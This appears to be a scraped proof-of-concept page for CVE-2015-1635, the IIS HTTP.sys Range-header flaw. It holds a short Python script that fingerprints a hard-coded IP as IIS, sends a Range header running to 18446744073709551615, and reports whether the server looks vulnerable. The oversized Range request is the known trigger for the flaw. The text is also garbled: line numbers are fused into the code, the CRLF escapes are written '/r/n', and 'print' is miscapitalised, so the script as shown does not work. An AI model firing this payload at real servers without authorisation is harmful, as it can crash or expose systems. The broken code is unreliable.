cve-2015-1635poc

 1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0/r/n/r/n" 6 req = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-" + hexAllFfff + "/r/n/r/n" 7 PRint("[*] Audit Started") 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 client_socket.connect((ipAddr, 80))10 client_socket.send(req1.encode())11 boringResp = client_socket.recv(1024).decode()12 if "Microsoft" not in boringResp:13                 print("[*] Not IIS")14                 exit(0)15 client_socket.close()16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)17 client_socket.connect((ipAddr, 80))18 client_socket.send(req.encode())19 goodResp = client_socket.recv(1024).decode()20 if "Requested Range Not Satisfiable" in goodResp:21                 print("[!!] Looks VULN")22 elif " The request has an invalid header name" in goodResp:23                 print("[*] Looks Patched")24 else:25                 print("[*] Unexpected response, cannot discern patch status")